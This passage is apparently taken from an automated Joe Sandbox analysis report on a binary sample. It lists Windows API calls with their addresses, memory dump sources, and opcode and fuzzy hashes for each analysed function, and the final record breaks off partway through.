                    • Instruction Fuzzy Hash: A0113A35900119EFCB10EFA4D8959FE77BDEB06310F004656F901EB251DB34BA928BA9
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006E01FD,?,006E1250,?,00008000), ref: 006E16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: ba42d0f49e3132793ae05acdaf6cb3c8bd5b077b4608c964541f8046b796507e
                    • Instruction ID: e1daa5118d634466031d8296209b210e529faf3421a946d369c1b41053c093f2
                    • Opcode Fuzzy Hash: ba42d0f49e3132793ae05acdaf6cb3c8bd5b077b4608c964541f8046b796507e
                    • Instruction Fuzzy Hash: C8118E31C0261CD7CF00EFA6D848AEEBB79FF0A701F148159E940BA240CB349560DBDA
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: f9a9c4af787ba85db7ad002f1e5e53e80f548f34418c1f9a1ca1c54afc2d5977
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 410180B204414ABBCF525E84DC018EE3F23BF99340F088515FA1868131C237CAB1AB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 0070B59E
                    • ScreenToClient.USER32(?,?), ref: 0070B5B6
                    • ScreenToClient.USER32(?,?), ref: 0070B5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0070B5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 5e0a3507ff45ed39f1091fae787280daafe1c2be0fe0e1796b90b639a0ad81e9
                    • Instruction ID: 8847ddff12bae08926fefd5c1a68d16412daa26e45b2120ab5954c1c35d541c7
                    • Opcode Fuzzy Hash: 5e0a3507ff45ed39f1091fae787280daafe1c2be0fe0e1796b90b639a0ad81e9
                    • Instruction Fuzzy Hash: 381146B5D00209EFDB51CF99C8449EEFBF9FB08310F108166E914E3620D735AA658F54
                    APIs
                    • _memset.LIBCMT ref: 0070B8FE
                    • _memset.LIBCMT ref: 0070B90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00747F20,00747F64), ref: 0070B93C
                    • CloseHandle.KERNEL32 ref: 0070B94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 40ecaf3e7e96627c70fd638aad59b0fc84cfbdd711f4af548d6b895efe93c027
                    • Instruction ID: 442b271344f584fe52e30b757b39323e5e68773734fe192f6823d2e4ad518a44
                    • Opcode Fuzzy Hash: 40ecaf3e7e96627c70fd638aad59b0fc84cfbdd711f4af548d6b895efe93c027
                    • Instruction Fuzzy Hash: 79F05EB6544310BBE3102B61AC06FBB7A9CEB0A754F008471FB08D5292E77A5D06C7AC
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 006E6E88
                      • Part of subcall function 006E794E: _memset.LIBCMT ref: 006E7983
                    • _memmove.LIBCMT ref: 006E6EAB
                    • _memset.LIBCMT ref: 006E6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 006E6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: fa149210b852a75f1937ccc3ff1d3ee130ec07c91f785b1871c3c0376d83e73a
                    • Instruction ID: 733628443bbbbb65c93aa01a0a55d16f6bba2a9eefb2905d19db772b999f5a11
                    • Opcode Fuzzy Hash: fa149210b852a75f1937ccc3ff1d3ee130ec07c91f785b1871c3c0376d83e73a
                    • Instruction Fuzzy Hash: 3DF0543A100210ABCF516F55DC85A49BB2AEF45320F04C065FE085F217CB35E911DBB8
                    APIs
                      • Part of subcall function 006812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068135C
                      • Part of subcall function 006812F3: BeginPath.GDI32(?), ref: 00681373
                      • Part of subcall function 006812F3: SelectObject.GDI32(?,00000000), ref: 0068139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0070C030
                    • LineTo.GDI32(00000000,?,?), ref: 0070C03D
                    • EndPath.GDI32(00000000), ref: 0070C04D
                    • StrokePath.GDI32(00000000), ref: 0070C05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: ea0d6137d7a448c58e89f879c7d63c8bf073b052971a81f23d35f45a824236a8
                    • Instruction ID: c6f9e02a4d0cdaa6fc96b9d06f752a531a2f338667137da19eb27908e44c752e
                    • Opcode Fuzzy Hash: ea0d6137d7a448c58e89f879c7d63c8bf073b052971a81f23d35f45a824236a8
                    • Instruction Fuzzy Hash: A3F0BE31000219FBDB226F50AC09FCE3F99AF06310F04C201FA11614E28BBD4661CBD9
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006DA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006DA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 006DA3B3
                    • AttachThreadInput.USER32(00000000), ref: 006DA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 331beb5d9e3fa253c21342d4783f8b4d9aad471363864449138ae66118d30a30
                    • Instruction ID: 1a439f7f9b2467e08deba01766fd68ff7acd27e12de472712de1e2a7cc00008c
                    • Opcode Fuzzy Hash: 331beb5d9e3fa253c21342d4783f8b4d9aad471363864449138ae66118d30a30
                    • Instruction Fuzzy Hash: A7E03931545328FADB205BA2DC0CED73F2EEF167A1F008125F508C4560CA76C541CBA5
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00682231
                    • SetTextColor.GDI32(?,000000FF), ref: 0068223B
                    • SetBkMode.GDI32(?,00000001), ref: 00682250
                    • GetStockObject.GDI32(00000005), ref: 00682258
                    • GetWindowDC.USER32(?,00000000), ref: 006BC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006BC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 006BC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 006BC112
                    • GetPixel.GDI32(00000000,?,?), ref: 006BC132
                    • ReleaseDC.USER32(?,00000000), ref: 006BC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 4848c22e0e8596184d98c2631f2cf2e232a8fa4ec3f840431d5f5ca990f2726d
                    • Instruction ID: 38960aa90977bbe17d5572d60e9e60f45d3ee3859829309dfe401b35264efadd
                    • Opcode Fuzzy Hash: 4848c22e0e8596184d98c2631f2cf2e232a8fa4ec3f840431d5f5ca990f2726d
                    • Instruction Fuzzy Hash: E7E06D32100248EADB315F68FC0D7D83B11EB05332F00C366FA69981E18B764A90DB11
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 006D8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,006D882E), ref: 006D8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006D882E), ref: 006D8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,006D882E), ref: 006D8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: cc7d8391dee9d83c2eb4e502c378325b511d09795c92e201f99bf7dd763f2978
                    • Instruction ID: c4bea09e23b8cb774ac4e5d25e3faf03dee77b0940febed476db96595e5f3486
                    • Opcode Fuzzy Hash: cc7d8391dee9d83c2eb4e502c378325b511d09795c92e201f99bf7dd763f2978
                    • Instruction Fuzzy Hash: A8E04F36A42211DBD7305FB06E0CB963BACAF50792F048928F245CA040DE3884418B65
                    APIs
                    • GetDesktopWindow.USER32 ref: 006C2187
                    • GetDC.USER32(00000000), ref: 006C2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006C21B1
                    • ReleaseDC.USER32(?), ref: 006C21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 9a50d67d5c8fd92ac591f8d2575892f86d1ecc71576375f109eb313aacdcb5a7
                    • Instruction ID: 6cda65e9f2e23ea5482fc905e9179b44ce4039e9216d6a06717705881cb11852
                    • Opcode Fuzzy Hash: 9a50d67d5c8fd92ac591f8d2575892f86d1ecc71576375f109eb313aacdcb5a7
                    • Instruction Fuzzy Hash: BAE0E575800604EFDB51AFA0C808AAD7BB2EB4C350F10C529F95A97620CF7991429F55
                    APIs
                    • GetDesktopWindow.USER32 ref: 006C219B
                    • GetDC.USER32(00000000), ref: 006C21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006C21B1
                    • ReleaseDC.USER32(?), ref: 006C21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 658075937c9c976d8871054ad5390897ba666f8fae572a3b9dde280571e017bf
                    • Instruction ID: 04cbb54bcb7ba5294826ae99fdec93784d16fb486ce85b6a4ac215a7a3aca031
                    • Opcode Fuzzy Hash: 658075937c9c976d8871054ad5390897ba666f8fae572a3b9dde280571e017bf
                    • Instruction Fuzzy Hash: 12E0E575800604EFCB61AFA0C80869D7BB2EB4C310F10C129F95A97620CF7991419F54
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: %q
                    • API String ID: 0-734004689
                    • Opcode ID: fbf7196e6864ff4011ac9bff105e6b9c278b77db0e926092cbe60bd616770437
                    • Instruction ID: d0b2aa99339e2c6db89789f1b18686cc00ed000cfbff7f35f033fe924d31f51f
                    • Opcode Fuzzy Hash: fbf7196e6864ff4011ac9bff105e6b9c278b77db0e926092cbe60bd616770437
                    • Instruction Fuzzy Hash: 5AB1A1B19001099BCF14FF98C4819EEB7B7FF44310F50422AF906A7295EB309E86CB66
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __itow_s
                    • String ID: xrt$xrt
                    • API String ID: 3653519197-931136551
                    • Opcode ID: fd7122c66c44763bebb3cf537b431afa94b8f7f2652b38e31d531b62c303e56c
                    • Instruction ID: c38c35480061fc568f18d81d3efbe9db7ea1f2895582e3903cf959069a0c3ee5
                    • Opcode Fuzzy Hash: fd7122c66c44763bebb3cf537b431afa94b8f7f2652b38e31d531b62c303e56c
                    • Instruction Fuzzy Hash: 19B18F70A00209AFCB14EF54C891EFEB7BAFF58300F149559FA459B292DB74EA41CB64
                    APIs
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • __wcsnicmp.LIBCMT ref: 006EB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006EB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: e8ef0a8fa79ea7ec250eb5d94fed009935ca8372252569c0e6ed822f3897f798
                    • Instruction ID: fac4408261a314dd2a9240ec22b0928f65e2bff52df2b69ef0d95c42f9701b42
                    • Opcode Fuzzy Hash: e8ef0a8fa79ea7ec250eb5d94fed009935ca8372252569c0e6ed822f3897f798
                    • Instruction Fuzzy Hash: CF617E75A00215AFCF14EB95C882EAEB7B6AF08310F15416AF546AB391DB70AE41CB94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oai
                    • API String ID: 4104443479-3423572213
                    • Opcode ID: 52f99d1444f332514e0d523a1ede93879d121f68d0ad6bde3fe81900e69ab2ec
                    • Instruction ID: f9e527100488f8ad46df7c60f126affe31e900b910353dcb5495514f9ca0a07d
                    • Opcode Fuzzy Hash: 52f99d1444f332514e0d523a1ede93879d121f68d0ad6bde3fe81900e69ab2ec
                    • Instruction Fuzzy Hash: 7D512C70A006099FCF64CFA8C480ABEBBB6FF45314F14852EE85AD7350EB31A956CB51
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00692AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00692AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: c3f7188f894f09d5695d421e4ce42bf8e9a487a4b046dde8c48a61aeca863d09
                    • Instruction ID: 3a052affef5640c8ba323f617d05538b0645cf69edbeb5f610f99e94fd92c0dc
                    • Opcode Fuzzy Hash: c3f7188f894f09d5695d421e4ce42bf8e9a487a4b046dde8c48a61aeca863d09
                    • Instruction Fuzzy Hash: C35165724187449BD360BF50D886BAFBBF8FF88314F56895CF1DA411A1DB308429CB2A
                    APIs
                      • Part of subcall function 0068506B: __fread_nolock.LIBCMT ref: 00685089
                    • _wcscmp.LIBCMT ref: 006E9AAE
                    • _wcscmp.LIBCMT ref: 006E9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 1a9b17715fe6950539660e6b581acc37ab8297a01785ac57fbdb599208600d68
                    • Instruction ID: df688eb55dc4066d1b463f00ca80cd0ac5a6a1cbf75a91a49b0b7148910fbee5
                    • Opcode Fuzzy Hash: 1a9b17715fe6950539660e6b581acc37ab8297a01785ac57fbdb599208600d68
                    • Instruction Fuzzy Hash: 6041F671A00759BADF20AAA5CC45FEFB7FEDF45710F00007DBA01E7281DA75AA448BA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID: Dtt$Dtt
                    • API String ID: 1473721057-4113666926
                    • Opcode ID: ed40b398894ce8c6a4de4e1273be7be587d6c4ed8ff6cf78a90277ab06de6932
                    • Instruction ID: c2fac3d9986bac2984a4143b9c9d7ddf98c6972eb7a66a9f87eb97b4a1cde163
                    • Opcode Fuzzy Hash: ed40b398894ce8c6a4de4e1273be7be587d6c4ed8ff6cf78a90277ab06de6932
                    • Instruction Fuzzy Hash: C151F778608341CFE754DF58C080A6ABBF2BB99354F548A5EF9858B321D735EC81CB82
                    APIs
                    • _memset.LIBCMT ref: 006F2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006F28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: d0c0a32e0bec7b7d699e2edf960ac2ee5d4a630351ee4a6f6e3b0722cbd26a08
                    • Instruction ID: 2a958bf4e9252a3f955c66594d7e946dc917896f616d87c3caa696c0541cb6d1
